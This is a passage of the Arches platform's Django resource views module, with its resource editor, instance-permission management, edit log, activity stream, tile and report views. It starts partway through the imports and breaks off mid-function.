django.shortcuts import redirect, render\nfrom django.template.loader import render_to_string\nfrom django.urls import reverse\nfrom django.utils.decorators import method_decorator\nfrom django.utils.translation import gettext as _\nfrom django.views.generic import View\nfrom django.utils import translation\n\nfrom arches.app.models import models\nfrom arches.app.models.card import Card\nfrom arches.app.models.graph import Graph\nfrom arches.app.models.tile import Tile\nfrom arches.app.models.resource import Resource, PublishedModelError\nfrom arches.app.models.system_settings import settings\nfrom arches.app.utils.activity_stream_jsonld import 
ActivityStreamCollection\nfrom arches.app.utils.betterJSONSerializer import JSONSerializer, JSONDeserializer\nfrom arches.app.utils.decorators import group_required\nfrom arches.app.utils.decorators import can_edit_resource_instance\nfrom arches.app.utils.decorators import can_delete_resource_instance\nfrom arches.app.utils.decorators import can_read_resource_instance\nfrom arches.app.utils.i18n import LanguageSynchronizer, localize_complex_input\nfrom arches.app.utils.pagination import get_paginator\nfrom arches.app.utils.permission_backend import (\n user_is_resource_editor,\n user_is_resource_reviewer,\n user_can_delete_resource,\n user_can_edit_resource,\n user_can_read_resource,\n)\nfrom arches.app.utils.response import JSONResponse, JSONErrorResponse\nfrom arches.app.search.search_engine_factory import SearchEngineFactory\nfrom arches.app.search.elasticsearch_dsl_builder import Query, Terms\nfrom arches.app.search.mappings import RESOURCES_INDEX\nfrom arches.app.views.base import BaseManagerView, MapBaseManagerView\nfrom arches.app.views.concept import Concept\nfrom arches.app.datatypes.datatypes import DataTypeFactory\nfrom elasticsearch import Elasticsearch\nfrom guardian.shortcuts import (\n assign_perm,\n get_perms,\n remove_perm,\n get_group_perms,\n get_user_perms,\n get_groups_with_perms,\n get_users_with_perms,\n get_perms_for_model,\n)\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n@method_decorator(can_edit_resource_instance, name=\"dispatch\")\nclass ResourceListView(BaseManagerView):\n def get(self, request, graphid=None, resourceid=None):\n context = self.get_context_data(main_script=\"views/resource\")\n\n context[\"nav\"][\"icon\"] = \"fa fa-bookmark\"\n context[\"nav\"][\"title\"] = _(\"Resource Manager\")\n context[\"nav\"][\"login\"] = True\n context[\"nav\"][\"help\"] = {\"title\": _(\"Creating Resources\"), \"templates\": [\"resource-editor-landing-help\"]}\n\n return render(request, \"views/resource.htm\", context)\n\n\ndef get_resource_relationship_types():\n resource_relationship_types = Concept().get_child_collections(\"00000000-0000-0000-0000-000000000005\")\n default_relationshiptype_valueid = None\n for relationship_type in resource_relationship_types:\n if relationship_type[0] == \"00000000-0000-0000-0000-000000000007\":\n default_relationshiptype_valueid = relationship_type[2]\n relationship_type_values = {\n \"values\": [{\"id\": str(c[2]), \"text\": str(c[1])} for c in resource_relationship_types],\n \"default\": str(default_relationshiptype_valueid),\n }\n return relationship_type_values\n\n\ndef get_instance_creator(resource_instance, user=None):\n creatorid = None\n can_edit = None\n if models.EditLog.objects.filter(resourceinstanceid=resource_instance.resourceinstanceid).filter(edittype=\"create\").exists():\n creatorid = (\n models.EditLog.objects.filter(resourceinstanceid=resource_instance.resourceinstanceid).filter(edittype=\"create\")[0].userid\n )\n if creatorid is None or creatorid == \"\":\n creatorid = settings.DEFAULT_RESOURCE_IMPORT_USER[\"userid\"]\n if user:\n can_edit = user.id == int(creatorid) or user.is_superuser\n return {\"creatorid\": creatorid, \"user_can_edit_instance_permissions\": can_edit}\n\n\n@method_decorator(group_required(\"Resource Editor\"), name=\"dispatch\")\nclass ResourceEditorView(MapBaseManagerView):\n action = None\n\n @method_decorator(can_edit_resource_instance, name=\"dispatch\")\n def get(\n self,\n request,\n graphid=None,\n resourceid=None,\n view_template=\"views/resource/editor.htm\",\n 
main_script=\"views/resource/editor\",\n nav_menu=True,\n ):\n if self.action == \"copy\":\n return self.copy(request, resourceid)\n\n creator = None\n user_created_instance = None\n\n languages = models.Language.objects.all()\n\n def prepare_tiledata(tile, nodes):\n datatype_factory = DataTypeFactory()\n datatype_lookup = {str(node.nodeid): datatype_factory.get_instance(node.datatype) for node in nodes}\n for nodeid in tile.data.keys():\n datatype = datatype_lookup[nodeid]\n datatype.pre_structure_tile_data(tile, nodeid, languages=languages)\n\n def add_i18n_to_cardwidget_defaults(cardwidgets):\n serialized_cardwidgets = JSONSerializer().serializeToPython(cardwidgets)\n\n for cardwidget in serialized_cardwidgets:\n if cardwidget[\"widget_id\"] in [\"10000000-0000-0000-0000-000000000005\", \"10000000-0000-0000-0000-000000000001\"]:\n try:\n default_value = cardwidget[\"config\"][\"defaultValue\"]\n except KeyError:\n default_value = None\n if default_value is None:\n existing_languages = []\n cardwidget[\"config\"][\"defaultValue\"] = {}\n elif type(default_value) is str:\n default_language = languages.get(code=settings.LANGUAGE_CODE)\n cardwidget[\"config\"][\"defaultValue\"] = {\n settings.LANGUAGE_CODE: {\"value\": default_value, \"direction\": default_language.default_direction}\n }\n existing_languages = [settings.LANGUAGE_CODE]\n else:\n existing_languages = list(default_value.keys())\n for language in languages:\n if language.code not in existing_languages:\n cardwidget[\"config\"][\"defaultValue\"][language.code] = {\"value\": \"\", \"direction\": language.default_direction}\n return serialized_cardwidgets\n\n def add_i18n_to_widget_defaults(widgets):\n for widget in widgets:\n if widget.datatype == \"string\":\n existing_languages = []\n default_value = widget.defaultconfig[\"defaultValue\"]\n if default_value != \"\" and default_value is not None:\n existing_languages = list(default_value.keys())\n for language in languages:\n if language.code not in existing_languages:\n widget.defaultconfig[\"defaultValue\"][language.code] = {\n \"value\": \"\",\n \"direction\": language.default_direction,\n }\n return widgets\n\n if resourceid is None:\n resource_instance = None\n graph = models.GraphModel.objects.get(pk=graphid)\n resourceid = \"\"\n else:\n resource_instance = Resource.objects.get(pk=resourceid)\n graph = resource_instance.graph\n instance_creator = get_instance_creator(resource_instance, request.user)\n creator = instance_creator[\"creatorid\"]\n user_created_instance = instance_creator[\"user_can_edit_instance_permissions\"]\n\n\n ontologyclass = None\n nodegroups = []\n editable_nodegroups = []\n\n nodes = graph.node_set.all().select_related(\"nodegroup\")\n for node in nodes:\n if node.istopnode and not ontologyclass:\n ontologyclass = node.ontologyclass\n\n if node.is_collector:\n added = False\n\n if request.user.has_perm(\"write_nodegroup\", node.nodegroup):\n editable_nodegroups.append(node.nodegroup)\n nodegroups.append(node.nodegroup)\n added = True\n\n if not added and request.user.has_perm(\"read_nodegroup\", node.nodegroup):\n nodegroups.append(node.nodegroup)\n\n primary_descriptor_functions = models.FunctionXGraph.objects.filter(graph=graph).filter(function__functiontype=\"primarydescriptors\")\n primary_descriptor_function = JSONSerializer().serialize(\n primary_descriptor_functions[0] if len(primary_descriptor_functions) > 0 else None\n )\n user_is_reviewer = user_is_resource_reviewer(request.user)\n is_system_settings = False\n if resource_instance is 
None:\n tiles = []\n displayname = _(\"New Resource\")\n else:\n displayname = resource_instance.displayname()\n if displayname == \"undefined\":\n displayname = _(\"Unnamed Resource\")\n if str(resource_instance.graph_id) == settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID:\n is_system_settings = True\n displayname = _(\"System Settings\")\n\n tiles = resource_instance.tilemodel_set.order_by(\"sortorder\").filter(nodegroup__in=nodegroups)\n provisionaltiles = []\n for tile in tiles:\n append_tile = True\n isfullyprovisional = False\n if tile.provisionaledits is not None:\n if len(list(tile.provisionaledits.keys())) > 0:\n if len(tile.data) == 0:\n isfullyprovisional = True\n if user_is_reviewer is False:\n if str(request.user.id) in tile.provisionaledits:\n tile.provisionaledits = {str(request.user.id): tile.provisionaledits[str(request.user.id)]}\n tile.data = tile.provisionaledits[str(request.user.id)][\"value\"]\n else:\n if isfullyprovisional is True:\n # if the tile IS fully provisional and the current user is not the owner,\n # we don't send that tile back to the client.\n append_tile = False\n else:\n # if the tile has authoritaive data and the current user is not the owner,\n # we don't send the provisional data of other users back to the client.\n tile.provisionaledits = None\n if append_tile is True:\n provisionaltiles.append(tile)\n tiles = provisionaltiles\n for tile in tiles:\n prepare_tiledata(tile, nodes)\n\n serialized_graph = None\n if graph.publication:\n try:\n published_graph = graph.get_published_graph()\n except models.PublishedGraph.DoesNotExist:\n LanguageSynchronizer.synchronize_settings_with_db()\n published_graph = graph.get_published_graph()\n\n serialized_graph = published_graph.serialized_graph\n\n if serialized_graph:\n serialized_cards = serialized_graph[\"cards\"]\n cardwidgets = [\n models.CardXNodeXWidget(**card_x_node_x_widget_dict) for card_x_node_x_widget_dict in serialized_graph[\"widgets\"]\n ]\n else:\n cards = graph.cardmodel_set.order_by(\"sortorder\").filter(nodegroup__in=nodegroups).prefetch_related(\"cardxnodexwidget_set\")\n serialized_cards = JSONSerializer().serializeToPython(cards)\n cardwidgets = []\n for card in cards:\n cardwidgets += list(card.cardxnodexwidget_set.order_by(\"sortorder\").all())\n\n updated_cardwidgets = add_i18n_to_cardwidget_defaults(cardwidgets)\n\n widgets = list(models.Widget.objects.all())\n updated_widgets = add_i18n_to_widget_defaults(widgets)\n\n card_components = models.CardComponent.objects.all()\n templates = models.ReportTemplate.objects.all()\n\n editable_nodegroup_ids = [str(nodegroup.pk) for nodegroup in editable_nodegroups]\n for card in serialized_cards:\n card[\"is_writable\"] = False\n if str(card[\"nodegroup_id\"]) in editable_nodegroup_ids:\n card[\"is_writable\"] = True\n\n context = self.get_context_data(\n main_script=main_script,\n resourceid=resourceid,\n displayname=displayname,\n graphid=graph.graphid,\n graphiconclass=graph.iconclass,\n graphname=graph.name,\n ontologyclass=ontologyclass,\n resource_graphs=(\n models.GraphModel.objects.exclude(pk=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID)\n .exclude(isresource=False)\n .exclude(publication=None)\n ),\n relationship_types=get_resource_relationship_types(),\n widgets=updated_widgets,\n widgets_json=JSONSerializer().serialize(updated_widgets),\n card_components=card_components,\n card_components_json=JSONSerializer().serialize(card_components),\n tiles=JSONSerializer().serialize(tiles),\n cards=JSONSerializer().serialize(serialized_cards),\n 
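            # most of the remaining entries are pre-serialized to JSON so the
            # editor templates can pass them straight to client-side viewmodels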
primary_descriptor_function=primary_descriptor_function,\n applied_functions=JSONSerializer().serialize(models.FunctionXGraph.objects.filter(graph=graph)),\n nodegroups=JSONSerializer().serialize(nodegroups),\n nodes=JSONSerializer().serialize(nodes.filter(nodegroup__in=nodegroups)),\n cardwidgets=JSONSerializer().serialize(updated_cardwidgets),\n datatypes_json=JSONSerializer().serialize(models.DDataType.objects.all(), exclude=[\"iconclass\", \"modulename\", \"classname\"]),\n map_markers=models.MapMarker.objects.all(),\n geocoding_providers=models.Geocoder.objects.all(),\n user_is_reviewer=json.dumps(user_is_reviewer),\n user_can_delete_resource=user_can_delete_resource(request.user, resourceid),\n creator=json.dumps(creator),\n user_created_instance=json.dumps(user_created_instance),\n report_templates=templates,\n templates_json=JSONSerializer().serialize(templates, sort_keys=False, exclude=[\"name\", \"description\"]),\n graph_json=JSONSerializer().serialize(graph),\n is_system_settings=is_system_settings,\n )\n\n context[\"nav\"][\"title\"] = \"\"\n context[\"nav\"][\"menu\"] = nav_menu\n \n if resourceid not in (None, \"\"):\n context[\"nav\"][\"report_view\"] = True\n\n if resourceid == settings.RESOURCE_INSTANCE_ID:\n context[\"nav\"][\"help\"] = {\"title\": _(\"Managing System Settings\"), \"templates\": [\"system-settings-help\"]}\n else:\n context[\"nav\"][\"help\"] = {\"title\": _(\"Using the Resource Editor\"), \"templates\": [\"resource-editor-help\"]}\n\n return render(request, view_template, context)\n\n def delete(self, request, resourceid=None):\n delete_error = _(\"Unable to Delete Resource\")\n delete_msg = _(\"User does not have permissions to delete this instance because the instance or its data is restricted\")\n try:\n if resourceid is not None:\n if user_can_delete_resource(request.user, resourceid) is False:\n return JSONErrorResponse(delete_error, delete_msg)\n ret = Resource.objects.get(pk=resourceid)\n try:\n deleted = ret.delete(user=request.user)\n except PublishedModelError as e:\n message = _(\"Unable to delete. 
Please verify the model is not currently published.\")\n return JSONResponse({\"status\": \"false\", \"message\": [_(e.title), _(str(message))]}, status=500)\n except PermissionDenied:\n return JSONErrorResponse(delete_error, delete_msg)\n if deleted is True:\n return JSONResponse(ret)\n else:\n return JSONErrorResponse(delete_error, delete_msg)\n return HttpResponseNotFound()\n except PermissionDenied:\n return JSONErrorResponse(delete_error, delete_msg)\n\n\n def copy(self, request, resourceid=None):\n resource_instance = Resource.objects.get(pk=resourceid)\n resource = resource_instance.copy()\n return JSONResponse({\"resourceid\": resource.resourceinstanceid})\n\n\n@method_decorator(group_required(\"Resource Editor\"), name=\"dispatch\")\nclass ResourcePermissionDataView(View):\n perm_cache = {}\n action = None\n\n def get(self, request):\n resourceid = request.GET.get(\"instanceid\", None)\n resource_instance = models.ResourceInstance.objects.get(pk=resourceid)\n result = self.get_instance_permissions(resource_instance)\n return JSONResponse(result)\n\n def post(self, request):\n resourceid = request.POST.get(\"instanceid\", None)\n action = request.POST.get(\"action\", None)\n graphid = request.POST.get(\"graphid\", None)\n result = None\n if action == \"restrict\":\n result = self.make_instance_private(resourceid, graphid)\n elif action == \"open\":\n result = self.make_instance_public(resourceid, graphid)\n else:\n data = JSONDeserializer().deserialize(request.body)\n self.apply_permissions(data, request.user)\n if \"instanceid\" in data:\n resource = models.ResourceInstance.objects.get(pk=data[\"instanceid\"])\n result = self.get_instance_permissions(resource)\n return JSONResponse(result)\n\n def delete(self, request):\n data = JSONDeserializer().deserialize(request.body)\n self.apply_permissions(data, request.user, revert=True)\n return JSONResponse(data)\n\n def get_perms(self, identity, type, obj, perms):\n if type == \"user\":\n identity_perms = get_user_perms(identity, obj)\n else:\n identity_perms = get_group_perms(identity, obj)\n res = []\n for perm in identity_perms:\n res += list(filter(lambda x: (x[\"codename\"] == perm), perms))\n return res\n\n def get_instance_permissions(self, resource_instance):\n permission_order = [\"view_resourceinstance\", \"change_resourceinstance\", \"delete_resourceinstance\", \"no_access_to_resourceinstance\"]\n perms = json.loads(\n JSONSerializer().serialize(\n {p.codename: p for p in get_perms_for_model(resource_instance) if p.codename != \"add_resourceinstance\"}\n )\n )\n ordered_perms = []\n for p in permission_order:\n ordered_perms.append(perms[p])\n identities = [\n {\n \"name\": user.username,\n \"id\": user.id,\n \"type\": \"user\",\n \"default_permissions\": self.get_perms(user, \"user\", resource_instance, ordered_perms),\n \"is_editor_or_reviewer\": bool(user_is_resource_editor(user) or user_is_resource_reviewer(user)),\n }\n for user in User.objects.all()\n ]\n identities += [\n {\n \"name\": group.name,\n \"id\": group.id,\n \"type\": \"group\",\n \"default_permissions\": self.get_perms(group, \"group\", resource_instance, ordered_perms),\n }\n for group in Group.objects.all()\n ]\n result = {\"identities\": identities}\n result[\"permissions\"] = ordered_perms\n result[\"limitedaccess\"] = (len(get_users_with_perms(resource_instance)) + len(get_groups_with_perms(resource_instance))) > 1\n instance_creator = get_instance_creator(resource_instance)\n result[\"creatorid\"] = instance_creator[\"creatorid\"]\n return result\n\n 
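    # make_instance_private (below) locks an instance down by assigning
    # "no_access_to_resourceinstance" to every user and group, then re-grants
    # view/change/delete to the recorded instance creator and removes the
    # creator's no-access flag, so the creator (and superusers) keep access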
def make_instance_private(self, resourceinstanceid, graphid=None):\n resource = Resource(resourceinstanceid)\n resource_instance = models.ResourceInstance.objects.get(pk=resourceinstanceid)\n resource.graph_id = graphid if graphid else str(resource_instance.graph_id)\n resource.createdtime = resource_instance.createdtime\n resource.add_permission_to_all(\"no_access_to_resourceinstance\")\n instance_creator = get_instance_creator(resource)\n user = User.objects.get(pk=instance_creator[\"creatorid\"])\n assign_perm(\"view_resourceinstance\", user, resource)\n assign_perm(\"change_resourceinstance\", user, resource)\n assign_perm(\"delete_resourceinstance\", user, resource)\n remove_perm(\"no_access_to_resourceinstance\", user, resource)\n return self.get_instance_permissions(resource)\n\n def make_instance_public(self, resourceinstanceid, graphid=None):\n resource = Resource(resourceinstanceid)\n resource_instance = models.ResourceInstance.objects.get(pk=resourceinstanceid)\n resource.graph_id = graphid if graphid else str(resource_instance.graph_id)\n resource.createdtime = resource_instance.createdtime\n resource.remove_resource_instance_permissions()\n return self.get_instance_permissions(resource)\n\n def apply_permissions(self, data, user, revert=False):\n with transaction.atomic():\n for instance in data[\"selectedInstances\"]:\n resource_instance = models.ResourceInstance.objects.get(pk=instance[\"resourceinstanceid\"])\n for identity in data[\"selectedIdentities\"]:\n if identity[\"type\"] == \"group\":\n identityModel = Group.objects.get(pk=identity[\"id\"])\n else:\n identityModel = User.objects.get(pk=identity[\"id\"])\n\n instance_creator = get_instance_creator(resource_instance, user)\n creator = instance_creator[\"creatorid\"]\n user_can_modify_permissions = instance_creator[\"user_can_edit_instance_permissions\"]\n\n if user_can_modify_permissions:\n # first remove all the current permissions\n for perm in get_perms(identityModel, resource_instance):\n remove_perm(perm, identityModel, resource_instance)\n\n if not revert:\n # then add the new permissions\n no_access = any(perm[\"codename\"] == \"no_access_to_resourceinstance\" for perm in identity[\"selectedPermissions\"])\n if no_access:\n assign_perm(\"no_access_to_resourceinstance\", identityModel, resource_instance)\n else:\n for perm in identity[\"selectedPermissions\"]:\n assign_perm(perm[\"codename\"], identityModel, resource_instance)\n\n resource = Resource.objects.get(pk=str(resource_instance.resourceinstanceid))\n resource.graph_id = resource_instance.graph_id\n resource.index()\n\n\n@method_decorator(can_edit_resource_instance, name=\"dispatch\")\nclass ResourceEditLogView(BaseManagerView):\n def getEditConceptValue(self, values):\n if values is not None:\n for k, v in values.items():\n try:\n uuid.UUID(v)\n v = models.Value.objects.get(pk=v).value\n values[k] = v\n except Exception as e:\n pass\n try:\n display_values = []\n for val in v:\n uuid.UUID(val)\n display_value = models.Value.objects.get(pk=val).value\n display_values.append(display_value)\n values[k] = display_values\n except Exception as e:\n pass\n\n def get(self, request, resourceid=None, view_template=\"views/resource/edit-log.htm\"):\n transaction_id = request.GET.get(\"transactionid\", None)\n if resourceid is None:\n if transaction_id:\n recent_edits = models.EditLog.objects.filter(transactionid=transaction_id).order_by(\"-timestamp\")\n else:\n recent_edits = (\n models.EditLog.objects.all()\n 
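                # hide internal system-settings edits from the activity feed
                # and cap the result at the 100 most recent entries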
.exclude(resourceclassid=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID)\n .order_by(\"-timestamp\")[:100]\n )\n edited_ids = list({edit.resourceinstanceid for edit in recent_edits})\n resources = Resource.objects.filter(resourceinstanceid__in=edited_ids).select_related(\"graph\")\n edit_type_lookup = {\n \"create\": _(\"Resource Created\"),\n \"delete\": _(\"Resource Deleted\"),\n \"tile delete\": _(\"Tile Deleted\"),\n \"tile create\": _(\"Tile Created\"),\n \"tile edit\": _(\"Tile Updated\"),\n \"delete edit\": _(\"Edit Deleted\"),\n \"bulk_create\": _(\"Resource Created\"),\n }\n deleted_instances = [e.resourceinstanceid for e in recent_edits if e.edittype == \"delete\"]\n graph_name_lookup = {str(r.resourceinstanceid): r.graph.name for r in resources}\n for edit in recent_edits:\n edit.friendly_edittype = edit_type_lookup[edit.edittype]\n edit.resource_model_name = None\n edit.deleted = edit.resourceinstanceid in deleted_instances\n if edit.resourceinstanceid in graph_name_lookup:\n edit.resource_model_name = graph_name_lookup[edit.resourceinstanceid]\n edit.displayname = edit.note\n if edit.resource_model_name is None:\n try:\n edit.resource_model_name = models.GraphModel.objects.get(pk=edit.resourceclassid).name\n except Exception:\n pass\n\n context = self.get_context_data(main_script=\"views/edit-history\", recent_edits=recent_edits)\n\n context[\"nav\"][\"title\"] = _(\"Recent Edits\")\n\n return render(request, \"views/edit-history.htm\", context)\n else:\n resource_instance = models.ResourceInstance.objects.get(pk=resourceid)\n edits = models.EditLog.objects.filter(resourceinstanceid=resourceid)\n permitted_edits = []\n for edit in edits:\n if edit.nodegroupid is not None:\n if request.user.has_perm(\"read_nodegroup\", edit.nodegroupid):\n if edit.newvalue is not None:\n self.getEditConceptValue(edit.newvalue)\n if edit.oldvalue is not None:\n self.getEditConceptValue(edit.oldvalue)\n permitted_edits.append(edit)\n else:\n permitted_edits.append(edit)\n\n resource = Resource.objects.get(pk=resourceid)\n displayname = resource.displayname()\n cards = Card.objects.filter(nodegroup__parentnodegroup=None, graph=resource_instance.graph)\n graph_name = resource_instance.graph.name\n\n context = self.get_context_data(\n main_script=\"views/resource/edit-log\",\n cards=JSONSerializer().serialize(cards),\n resource_type=graph_name,\n resource_description=resource.displaydescription(),\n iconclass=resource_instance.graph.iconclass,\n edits=JSONSerializer().serialize(localize_complex_input(permitted_edits)),\n resourceid=resourceid,\n displayname=_(\"Unnamed Resource\") if displayname == \"undefined\" else displayname,\n )\n\n context[\"nav\"][\"res_edit\"] = True\n context[\"nav\"][\"icon\"] = resource_instance.graph.iconclass\n context[\"nav\"][\"title\"] = graph_name\n\n return render(request, view_template, context)\n\n\n@method_decorator(can_edit_resource_instance, name=\"dispatch\")\nclass ResourceActivityStreamPageView(BaseManagerView):\n def get(self, request, page=None):\n current_page = 1\n page_size = 100\n if hasattr(settings, \"ACTIVITY_STREAM_PAGE_SIZE\"):\n page_size = int(settings.ACTIVITY_STREAM_PAGE_SIZE)\n st = 0\n end = 100\n if page is not None:\n try:\n current_page = int(page)\n if current_page <= 0:\n current_page = 1\n st = (current_page - 1) * page_size\n end = current_page * page_size\n except (ValueError, TypeError) as e:\n return HttpResponseBadRequest()\n\n totalItems = 
models.EditLog.objects.all().exclude(resourceclassid=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID).count()\n\n edits = (\n models.EditLog.objects.all().exclude(resourceclassid=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID).order_by(\"timestamp\")[st:end]\n )\n\n # setting last to be same as first, changing later if there are more pages\n uris = {\n \"root\": request.build_absolute_uri(reverse(\"as_stream_collection\")),\n \"this\": request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": current_page})),\n \"first\": request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": 1})),\n \"last\": request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": 1})),\n }\n\n if current_page > 1:\n uris[\"prev\"] = request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": current_page - 1}))\n if end < totalItems:\n uris[\"next\"] = request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": current_page + 1}))\n if totalItems > page_size:\n uris[\"last\"] = (request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": int(totalItems / page_size) + 1})),)\n\n collection = ActivityStreamCollection(uris, totalItems, base_uri_for_arches=request.build_absolute_uri(\"/\").rsplit(\"/\", 1)[0])\n\n collection_page = collection.generate_page(uris, edits)\n collection_page.startIndex((current_page - 1) * page_size)\n\n return JsonResponse(collection_page.to_obj())\n\n\n@method_decorator(can_edit_resource_instance, name=\"dispatch\")\nclass ResourceActivityStreamCollectionView(BaseManagerView):\n def get(self, request):\n page_size = 100\n if hasattr(settings, \"ACTIVITY_STREAM_PAGE_SIZE\"):\n page_size = int(settings.ACTIVITY_STREAM_PAGE_SIZE)\n\n totalItems = models.EditLog.objects.all().exclude(resourceclassid=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID).count()\n\n uris = {\n \"root\": request.build_absolute_uri(reverse(\"as_stream_collection\")),\n \"first\": request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": 1})),\n \"last\": request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": 1})),\n }\n\n if totalItems > page_size:\n uris[\"last\"] = request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": int(totalItems / page_size) + 1}))\n\n collection = ActivityStreamCollection(uris, totalItems, base_uri_for_arches=request.build_absolute_uri(\"/\").rsplit(\"/\", 1))\n\n return JsonResponse(collection.to_obj())\n\n\n@method_decorator(can_edit_resource_instance, name=\"dispatch\")\nclass ResourceData(View):\n def get(self, request, resourceid=None, formid=None):\n if formid is not None:\n form = Form(resourceid=resourceid, formid=formid, user=request.user)\n return JSONResponse(form)\n\n return HttpResponseNotFound()\n\n\n@method_decorator(can_read_resource_instance, name=\"dispatch\")\nclass ResourceTiles(View):\n def get(self, request, resourceid=None, include_display_values=True):\n datatype_factory = DataTypeFactory()\n nodeid = request.GET.get(\"nodeid\", None)\n search_term = request.GET.get(\"term\", None)\n permitted_tiles = []\n perm = \"read_nodegroup\"\n tiles = models.TileModel.objects.filter(resourceinstance_id=resourceid)\n if nodeid is not None:\n node = models.Node.objects.get(pk=nodeid)\n tiles = tiles.filter(nodegroup=node.nodegroup)\n\n for tile in tiles:\n if request.user.has_perm(perm, tile.nodegroup):\n tile = Tile.objects.get(pk=tile.tileid)\n tile.filter_by_perm(request.user, perm)\n tile_dict = model_to_dict(tile)\n if include_display_values:\n 
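                    # resolve each node's raw tile value through its datatype so
                    # the client receives display text (e.g. concept labels
                    # instead of value UUIDs); when a search term is supplied,
                    # only tiles with a matching display value are returned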
tile_dict[\"display_values\"] = []\n for node in models.Node.objects.filter(nodegroup=tile.nodegroup):\n if str(node.nodeid) in tile.data:\n datatype = datatype_factory.get_instance(node.datatype)\n display_value = datatype.get_display_value(tile, node)\n if display_value is not None:\n if search_term is not None and search_term in display_value:\n tile_dict[\"display_values\"].append({\"value\": display_value, \"label\": node.name, \"nodeid\": node.nodeid})\n elif search_term is None:\n tile_dict[\"display_values\"].append({\"value\": display_value, \"label\": node.name, \"nodeid\": node.nodeid})\n\n if search_term is None:\n permitted_tiles.append(tile_dict)\n elif len(tile_dict[\"display_values\"]) > 0:\n permitted_tiles.append(tile_dict)\n return JSONResponse({\"tiles\": permitted_tiles})\n\n\n@method_decorator(can_read_resource_instance, name=\"dispatch\")\nclass ResourceCards(View):\n def get(self, request, resourceid=None):\n cards = []\n if resourceid is not None:\n graph = models.GraphModel.objects.get(graphid=resourceid)\n cards = [Card.objects.get(pk=card.cardid) for card in models.CardModel.objects.filter(graph=graph)]\n return JSONResponse({\"success\": True, \"cards\": cards})\n\n\nclass ResourceDescriptors(View):\n def get_localized_descriptor(self, document, descriptor_type):\n language_codes = (translation.get_language(), settings.LANGUAGE_CODE)\n descriptor = document[\"_source\"][descriptor_type]\n result = descriptor[0] if len(descriptor) > 0 else {\"value\": _(\"Undefined\")}\n for language_code in language_codes:\n for entry in descriptor:\n if entry[\"language\"] == language_code and entry[\"value\"] != \"\":\n return entry[\"value\"]\n return result[\"value\"]\n\n def get(self, request, resourceid=None):\n if Resource.objects.filter(pk=resourceid).exclude(pk=settings.SYSTEM_SETTINGS_RESOURCE_ID).exists():\n try:\n resource = Resource.objects.get(pk=resourceid)\n se = SearchEngineFactory().create()\n document = se.search(index=RESOURCES_INDEX, id=resourceid)\n return JSONResponse(\n {\n \"graphid\": document[\"_source\"][\"graph_id\"],\n \"graph_name\": resource.graph.name,\n \"displaydescription\": self.get_localized_descriptor(document, \"displaydescription\"),\n \"map_popup\": self.get_localized_descriptor(document, \"map_popup\"),\n \"displayname\": self.get_localized_descriptor(document, \"displayname\"),\n \"geometries\": document[\"_source\"][\"geometries\"],\n \"permissions\": document[\"_source\"][\"permissions\"],\n \"userid\": request.user.id,\n }\n )\n except Exception as e:\n logger.exception(_(\"Failed to fetch resource instance descriptors\"))\n\n return HttpResponseNotFound()\n\n\n@method_decorator(can_read_resource_instance, name=\"dispatch\")\nclass ResourceReportView(MapBaseManagerView):\n def get(self, request, resourceid=None):\n resource = Resource.objects.only(\"graph_id\").get(pk=resourceid)\n graph = Graph.objects.get(graphid=resource.graph_id)\n\n try:\n map_markers = models.MapMarker.objects.all()\n geocoding_providers = models.Geocoder.objects.all()\n except AttributeError:\n raise Http404(_(\"No active report template is available for this resource.\"))\n\n context = self.get_context_data(\n main_script=\"views/resource/report\",\n resourceid=resourceid,\n report_templates=models.ReportTemplate.objects.all(),\n card_components=models.CardComponent.objects.all(),\n widgets=models.Widget.objects.all(),\n map_markers=map_markers,\n geocoding_providers=geocoding_providers,\n )\n\n if graph.iconclass:\n context[\"nav\"][\"icon\"] = 
graph.iconclass\n context[\"nav\"][\"title\"] = graph.name\n context[\"nav\"][\"res_edit\"] = True\n context[\"nav\"][\"print\"] = True\n\n return render(request, \"views/resource/report.htm\", context)\n\n\n@method_decorator(can_read_resource_instance, name=\"dispatch\")\nclass RelatedResourcesView(BaseManagerView):\n action = None\n graphs = (\n models.GraphModel.objects.all()\n .exclude(pk=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID)\n .exclude(isresource=False)\n .exclude(publication=None)\n )\n\n def paginate_related_resources(self, related_resources, page, request):\n total = related_resources[\"total\"][\"value\"]\n paginator, pages = get_paginator(request, related_resources, total, page, settings.RELATED_RESOURCES_PER_PAGE)\n page = paginator.page(page)\n\n def parse_relationshiptype_label(relationship):\n if relationship[\"relationshiptype_label\"].startswith(\"http\"):\n relationship[\"relationshiptype_label\"] = relationship[\"relationshiptype_label\"].rsplit(\"/\")[-1]\n return relationship\n\n related_resources[\"resource_relationships\"] = [parse_relationshiptype_label(r) for r in related_resources[\"resource_relationships\"]]\n\n ret = {}\n ret[\"related_resources\"] = related_resources\n ret[\"paginator\"] = {}\n ret[\"paginator\"][\"current_page\"] = page.number\n ret[\"paginator\"][\"has_next\"] = page.has_next()\n ret[\"paginator\"][\"has_previous\"] = page.has_previous()\n ret[\"paginator\"][\"has_other_pages\"] = page.has_other_pages()\n ret[\"paginator\"][\"next_page_number\"] = page.next_page_number() if page.has_next() else None\n ret[\"paginator\"][\"previous_page_number\"] = page.previous_page_number() if page.has_previous() else None\n ret[\"paginator\"][\"start_index\"] = page.start_index()\n ret[\"paginator\"][\"end_index\"] = page.end_index()\n ret[\"paginator\"][\"pages\"] = pages\n\n return ret\n\n def get(self, request, resourceid=None):\n ret = {}\n\n if self.action == \"get_candidates\":\n resourceid = request.GET.get(\"resourceids\", \"\")\n resources = Resource.objects.filter(resourceinstanceid=resourceid).prefetch_related(\"graph__functions\")\n ret = []\n\n for resource in resources:\n res = 